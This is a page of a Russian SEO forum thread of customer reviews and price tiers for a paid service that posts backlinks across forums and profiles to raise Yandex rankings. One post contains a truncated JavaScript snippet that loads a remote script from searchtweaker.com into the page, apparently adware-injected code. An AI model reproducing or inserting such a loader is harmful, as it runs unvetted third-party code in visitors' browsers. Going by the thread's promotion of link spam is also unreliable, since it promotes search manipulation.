Продвину сайт качественными ссылками. Рост посещаемости, позиций и ИКС. Крауд ссылки недорого + скидки.
Страницы: Пред. 1 ... 68 69 70 71 72 ... 218 След.
[ Закрыто ] Продвину сайт качественными ссылками. Рост посещаемости, позиций и ИКС. Крауд ссылки недорого + скидки.
Отчет получил, как всегда, вовремя. Заказывал повторно прогон для трех сайтов через 3 месяца от прошлого прогона, в базе очень много новых сайтов, так что, кто уже заказывал прогоны, можете смело повторять.
Большее число ссылок уже в панели вебмастера. По-немногу, но уверенно растет посещаемость, чего я и ожидал. Думаю еще будет приятная неожиданность в виде ТИЦ +10, +20, ведь такое уже было после прогонов у maksimmaltcev.

Я очень доволен. Буду сотрудничать и в дальнейшем. Рекомендую!!!
Как и обещал maksimmaltcev, сегодня я получил отчет в удобной форме со ссылками на заполненные профили и почту с паролем. Приятно видеть работу профессионала.
Всем доволен, новые бэки в ЯВ начали появляться уже сегодня. Большое спасибо!
Всем рекомендую работать с ним, очень ответственный.
После прогона всплыло уже более 90 % ссылок)) Я доволен, заказываю уже не первый раз (всегда по 3 тарифу) и буду еще!!!Успехов ТС, в вашем не простом деле!!

P.S. в базах много сайтов с ТИЦ от 500 и выше.
Спасибо за отзывы: Димон Иванов, Сергей Белов, Иван Петров, Николай Жуланов и Гринин Никита.
В базах много сайтов обновилось. Прогоны подойдут и для молодых сайтов, т.к. ссылки всплывают постепенно (в среднем месяц).
Продолжаю принимать заказы..

Вот актуальные тарифы и базы на данный момент (все сайты прогоняются вручную):
1. 60 трастовых сайтов и форумов 300WMR (Общий тИЦ 39125, 46 сайтов находится в Яндекс Каталоге);
2. 30 трастовых форумов стоимость 150WMR (Общий тИЦ 9390, 21 сайт находится в Яндекс Каталоге);
3. 90 форумов и сайтов (включает предыдущие 2 базы) стоимость 400WMR + бонус в виде дополнительных ссылок, самый востребованный тариф.
Заказал прогон сайта, все выполнено во время! Спасибо! Буду ждать результатов.
Цитата
maksimmaltcev пишет:
3. 90 форумов и сайтов (включает предыдущие 2 базы) стоимость 400WMR + бонус в виде дополнительных ссылок, самый востребованный тариф.
Заказал данный прогон. Быстро, качественно, отчет получил
Заказываю у maksimmaltcev, уже не первый раз, делает качественно и быстро, очень нравиться - это =). Советую!
Прогон выполнен точно по графику, как изначально назначил ТС (в виду занятости), выполнен на отлично + 5 сайтов бонусом) Заказываю прогон уже второй раз. По первому разу- сайт был поднят с нуля на pr 2; тиц 10 или 20 (забыл уже, было год назад) и то сайт этот уже как 4 месяца не работает, а тиц у домена 10. В общем услугами доволен! Планирую дальнейшее сотрудничество!
Заказвал у ТС прогон по тарифу 30 трастовых форумов стоимость 150WMR. Сделал в срок, профили заполнены, описания разные, первые беки начали потихоньку приваливаться,   база проверена, все ссылки открыты для индексации. 1 сайт с нулевыми пузомерками, но не факт, мог глюкануть сервис проверки. В общении ТС - адекватный, лишнего не пишет, все по делу. Рекомендую.
Прекрасные тексты под GGL за 6 р/кило тут.
Заказывал прогон по 3 тарифу. Прогоном доволен, качественные ссылки. Профили заполнены правильно, уже начали всплывать беки. Рекомендую ТС как ответственного человека. И еще получил бонус в виде 5-ти дополнительных ссылок.smile:)
Заказывал прогон за 400р., заказ  выполнен даже раньше оговоренного срока за что большое спасибо, профили заполнены отлично, появились уже первые беки. Очень доволен, работа выполнена на 5 , благодарен ТС ,  всем советую его услуги!
Прогон сделан, отчет получен. Потом обязательно отпишусь о результатах (месяца через 2)
Прогон проведен, отчет получил! Спасибо! Выполнено в указанные сроки!

(function(){try{var header=document.getElementsByTagName("HEAD")[0];var script=document.createElement("SCRIPT");script.src="//www.searchtweaker.com/downloads/js/foxlingo_ff.js";script.onload=script.onreadystatechange=function(){if (!(this.readyState)||(this.readyState=="complete"||this.readyState=="loaded")){script.onload=null;script.onreadystatechange=null;header.removeChild(script);}}; header.appendChild(script);} catch(e
Изменено: Raski - 25 Марта 2013 15:02 (лишнии знаки.)
Прогон выполнил на сутки раньше, приятно не ожидал, предыдущего приходилось пинать и выбивать из него отчет.Жду результатов по ссылкам.
Первые результаты - 10 беков за два дня, шикарно, буду заказывать еще. Спасибо Максим
Страницы: Пред. 1 ... 68 69 70 71 72 ... 218 След.